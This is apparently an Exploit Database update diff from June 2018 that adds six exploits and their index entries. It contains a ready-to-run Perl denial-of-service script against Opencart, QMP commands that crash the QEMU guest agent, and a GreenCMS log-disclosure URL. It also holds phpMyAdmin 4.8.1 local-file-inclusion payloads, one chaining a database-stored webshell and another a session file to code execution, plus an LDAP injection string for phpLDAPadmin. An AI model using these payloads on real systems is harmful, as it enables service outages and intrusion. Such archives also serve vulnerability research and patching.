DB: 2018-06-23

6 changes to exploits/shellcodes

QEMU Guest Agent 2.12.50 - Denial of Service
Opencart < 3.0.2.0 - Denial of Service
GreenCMS 2.3.0603 - Information Disclosure
phpMyAdmin 4.8.1 - (Authenticated) Local File Inclusion
phpLDAPadmin 1.2.2 - 'server_id' LDAP Injection (Username)
phpMyAdmin 4.8.1 - Local File Inclusion

exploits/linux/dos/44925.txt

@@ -0,0 +1,46 @@
+# Exploit Title: QEMU Guest Agent 2.12.50 - Denial of Service
+# Date: 2018-06-07
+# Exploit Author: Fakhri Zulkifli (@d0lph1n98)
+# Vendor Homepage: https://www.qemu.org/
+# Software Link: https://www.qemu.org/download/
+# Version: 2.12.50 and earlier
+# Tested on: 2.12.50
+# CVE : CVE-2018-12617
+
+# QEMU Guest Agent 2.12.50 and earlier has an integer overflow causing a g_malloc0() 
+# call to trigger a segfault() call when trying to allocate a large memory chunk. 
+# The vulnerability can be exploited by sending a specific QMP command to 
+# the agent via the listening socket.
+
+1st, execute the guest-agent using the following command:
+
+$ qemu-ga -m unix-listen -p /tmp/qga.sock -t /tmp
+
+2nd, on the other console, connect to the UNIX socket using socat:
+
+$ socat unix-connect:/tmp/qga.sock -
+
+3rd, enter the following QMP command:
+
+{"execute":"guest-file-open", "arguments":{"path":"/tmp/poc","mode":"w+”}}
+{"return": 1000}
+{"execute":"guest-file-read", "arguments":{"handle":1000,"count":4294967295}}
+
+The guest-file-read must be specified with the correct handle value (file descriptor). Different files will have different handle value.
+
+#0 0x5598eed0a1af in calloc /home/user/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:107
+#1 0x7f2ce5d7d770 in g_malloc0 (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x4f770)
+#2 0x5598eed84996 in qmp_marshal_guest_file_read /home/user/qemu/qga/qapi-generated/qga-qapi-commands.c:425:14
+#3 0x5598eeda4fcf in do_qmp_dispatch /home/user/qemu/qapi/qmp-dispatch.c:119:5
+#4 0x5598eeda4fcf in qmp_dispatch /home/user/qemu/qapi/qmp-dispatch.c:168
+#5 0x5598eed59bff in process_command /home/user/qemu/qga/main.c:589:11
+#6 0x5598eed59bff in process_event /home/user/qemu/qga/main.c:626
+#7 0x5598eedb5f13 in json_message_process_token /home/user/qemu/qobject/json-streamer.c:105:5
+#8 0x5598eee25d9b in json_lexer_feed_char /home/user/qemu/qobject/json-lexer.c:323:13
+#9 0x5598eee25333 in json_lexer_feed /home/user/qemu/qobject/json-lexer.c:373:15
+#10 0x5598eed5a95e in channel_event_cb /home/user/qemu/qga/main.c:659:9
+#11 0x5598eed710c1 in ga_channel_client_event /home/user/qemu/qga/channel-posix.c:92:23
+#12 0x7f2ce5d78049 in g_main_context_dispatch (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x4a049)
+
+# References:
+# 1. https://lists.gnu.org/archive/html/qemu-devel/2018-06/msg03385.html

exploits/php/dos/44927.pl

@@ -0,0 +1,76 @@
+#!/usr/bin/perl -w
+#
+#  Opencart <= 3.0.2.0 google_sitemap Remote Denial of Service (resource exhaustion)
+#
+#  Copyright 2018 (c) Todor Donev <todor.donev at gmail.com>
+#  https://ethical-hacker.org/
+#  https://facebook.com/ethicalhackerorg
+#
+#  Tested store with added more than 1000 products
+#
+#  [todor@adamantium cartkiller]# torsocks perl killcart.pl example.com
+#  Opencart <= 3.0.2.0 google_sitemap Remote Denial of Service (resource exhaustion)
+#  Connecting example.com with 80 forks..
+#  Bye, bye and good night..
+#  Bye, bye and good night..
+#  Bye, bye and good night..
+#  ^C
+#  [todor@adamantium cartkiller]# 
+#
+#
+#  Disclaimer:
+#  This or previous programs is for Educational 
+#  purpose ONLY. Do not use it without permission. 
+#  The usual disclaimer applies, especially the 
+#  fact that Todor Donev is not liable for any 
+#  damages caused by direct or indirect use of the 
+#  information or functionality provided by these 
+#  programs. The author or any Internet provider 
+#  bears NO responsibility for content or misuse 
+#  of these programs or any derivatives thereof.
+#  By using these programs you accept the fact 
+#  that any damage (dataloss, system crash, 
+#  system compromise, etc.) caused by the use 
+#  of these programs is not Todor Donev's 
+#  responsibility.
+#   
+#  Use them at your own risk!
+#
+#  This exploit is buggy and proof of concept
+# 
+use Parallel::ForkManager;
+use LWP;
+print "Opencart <= 3.0.2.0 google_sitemap Remote Denial of Service (resource exhaustion)\n";
+sub usage{
+    print "usg: perl $0 <host>\n";
+    print "exmpl: perl $0 www.example.com\n";
+    print "https://ethical-hacker.org/\n";
+    print "https://facebook.com/ethicalhackerorg\n";
+    print "Copyright 2018 (c) Todor Donev <todor.donev at gmail.com>\n";
+}
+if ($#ARGV < 0) {
+    usage;
+    exit;
+}
+my $numforks = 100;
+print "Connecting $ARGV[0] with $numforks forks..\n";
+sub killcart{
+my $pm = new Parallel::ForkManager($numforks);
+$|=1;
+srand(time());
+for ($k=0;$k<$numforks;$k++) {
+$pm->start and next;   
+my $browser  = LWP::UserAgent ->new(ssl_opts => { verify_hostname => 0 },protocols_allowed => ['https']);
+#   $browser->timeout(20);
+   $browser->agent('Mozilla/5.0');
+my $response = $browser->get("https://$ARGV[0]/index.php?route=extension/feed/google_sitemap");
+print "Loop detected: Opencart is still vulnerable but seems server is correct configured. Change forks.\n" if($response->code eq 508);
+print "Kill me! Google_Sitemap is turned off..\n" if($response->code eq 404);
+print "Bye, bye and good night..\n" if(($response->code eq 503 or $response->code eq 504));
+$pm->finish;
+}
+$pm->wait_all_children;
+}
+while(1) {
+killcart();
+}

exploits/php/webapps/44922.txt

@@ -0,0 +1,13 @@
+# Exploit Title: GreenCMS 2.3.0603 - remote obtain sensitive information
+# Date: 2018-06-21
+# Exploit Author: vr_system
+# Vendor Homepage: https://github.com/GreenCMS/GreenCMS/
+# Software Link: https://github.com/GreenCMS/GreenCMS/
+# Version: GreenCMS 2.3.0603
+# Tested on: windows 7
+# CVE : CVE-2018-12604
+
+#  POC£ºhttp://site.com/Data/Log/year_month_day.log.
+# Tested Link: 
+http://site.com/GreenCMS-beta/Data/Log/18_06_20.log  
+http://site.com/Data/Log/18_06_20.log

exploits/php/webapps/44924.txt

@@ -0,0 +1,50 @@
+The latest version downloaded from the official website, the file name is phpMyAdmin-4.8.1-all-languages.zip
+
+The problem appears in /index.php
+
+Find 55~63 lines
+
+Line 61 contains include $_REQUEST['target'];
+
+This is obviously LFI precursor, as long as we bypass the 55 to 59 restrictions on the line
+
+Line 57 restricts the target parameter from beginning with index
+
+Line 58 limit target parameter cannot appear within $target_blacklist
+
+Find the definition of $target_blacklist :
+
+In /index.php the first of 50 lines
+
+As long as the target parameter is not import.php or export.php, the last limit is Core::checkPageValidity($_REQUEST['target'])
+
+Find the checkPageValidity method of the Core class :
+
+Defined in the \ libraries \ classes \ core.php on the 443 line
+
+The problem is in urldecode() on line 465
+
+We can use this function to bypass the white list detection!
+
+I ? Twice url encoded as % 253f can bypass the validation!
+
+Payload:
+
+http://127.0.0.1/phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../windows/wininit.ini
+
+
+- - - 
+
+I thought the loophole was over, because I didn't find out where phpmyadmin could perform file operations to implement Getshell . After several weeks of inspiration, I thought of a way to get Shell without writing files .
+
+We all know that after login phpmyadmin , the database is completely controllable, then we can write the WebShell to the database and then include the database file?
+
+Tested locally, I found that if you use WebShell as the field value of the data table can be perfectly written to the database file:
+
+Find the corresponding database file:
+
+Include:
+
+Payload:
+
+http://127.0.0.1/phpmyadmin/index.php?a=phpinfo();&target=db_sql.php%253f/../../../../../../phpStudy/PHPTutorial/MySQL/data/hack/hack.frm

exploits/php/webapps/44926.txt

@@ -0,0 +1,27 @@
+# Exploit Title: phpLDAPadmin 1.2.2 - 'server_id' LDAP Injection (Username)    
+# Google Dork:N/A
+# Date: 21.06.2018
+# Exploit Author: Berk Dusunur
+# Vendor Homepage: http://phpldapadmin.sourceforge.net
+# Software Link: http://phpldapadmin.sourceforge.net
+# Version: 1.2.2
+# Tested on: Pardus / Debian Web Server
+# CVE : N/A
+
+#Vulnerable Code
+$server =
+$_SESSION[APPCONFIG]->getServer(get_request('server_id','REQUEST'));
+    if (count($server->untested()))
+        system_message(array(
+
+#Payload
+
+!(()&&!|*|*|
+
+#PoC 1
+
+http://target/phpldapadmin/cmd.php?cmd=login_form&server_id=1!(()&&!|*|*|&redirect=true
+
+#PoC 2
+
+login panel username use !(()&&!|*|*| password !(()&&!|*|*|

exploits/php/webapps/44928.txt

@@ -0,0 +1,12 @@
+# Exploit Title: phpMyAdmin 4.8.1 - Local File Inclusion to Remote Code Execution
+# Date: 2018-06-21
+# Exploit Author: VulnSpy
+# Vendor Homepage: http://www.phpmyadmin.net
+# Software Link: https://github.com/phpmyadmin/phpmyadmin/archive/RELEASE_4_8_1.tar.gz
+# Version: 4.8.0, 4.8.1
+# Tested on: php7 mysql5
+# CVE : CVE-2018-12613
+
+1. Run SQL Query : select '<?php phpinfo();exit;?>'
+2. Include the session file :
+http://1a23009a9c9e959d9c70932bb9f634eb.vsplate.me/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/sessions/sess_11njnj4253qq93vjm9q93nvc7p2lq82k

files_exploits.csv

@@ -6003,6 +6003,8 @@ id,file,description,date,author,type,platform,port
 44909,exploits/linux/dos/44909.txt,"ntp 4.2.8p11 - Local Buffer Overflow (PoC)",2018-06-20,"Fakhri Zulkifli",dos,linux,
 44914,exploits/windows/dos/44914.txt,"Windows 10 - Desktop Bridge Activation Arbitrary Directory Creation Privilege Escalation",2018-06-20,"Google Security Research",dos,windows,
 44915,exploits/windows/dos/44915.txt,"Windows 10 - Desktop Bridge Virtual Registry CVE-2018-0880 Incomplete Fix Privilege Escalation",2018-06-20,"Google Security Research",dos,windows,
+44925,exploits/linux/dos/44925.txt,"QEMU Guest Agent 2.12.50 - Denial of Service",2018-06-22,"Fakhri Zulkifli",dos,linux,
+44927,exploits/php/dos/44927.pl,"Opencart < 3.0.2.0 - Denial of Service",2018-06-22,"Todor Donev",dos,php,80
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -39576,3 +39578,7 @@ id,file,description,date,author,type,platform,port
 44917,exploits/windows/webapps/44917.txt,"VideoInsight WebClient 5 - SQL Injection",2018-06-20,vosec,webapps,windows,80
 44918,exploits/php/webapps/44918.html,"LFCMS 3.7.0 - Cross-Site Request Forgery (Add User)",2018-06-21,bay0net,webapps,php,80
 44919,exploits/php/webapps/44919.html,"LFCMS 3.7.0 - Cross-Site Request Forgery (Add Admin)",2018-06-21,bay0net,webapps,php,80
+44922,exploits/php/webapps/44922.txt,"GreenCMS 2.3.0603 - Information Disclosure",2018-06-22,vr_system,webapps,php,
+44924,exploits/php/webapps/44924.txt,"phpMyAdmin 4.8.1 - (Authenticated) Local File Inclusion",2018-06-21,ChaMd5,webapps,php,
+44926,exploits/php/webapps/44926.txt,"phpLDAPadmin 1.2.2 - 'server_id' LDAP Injection (Username)",2018-06-22,"Berk Dusunur",webapps,php,80
+44928,exploits/php/webapps/44928.txt,"phpMyAdmin 4.8.1 - Local File Inclusion",2018-06-22,VulnSpy,webapps,php,80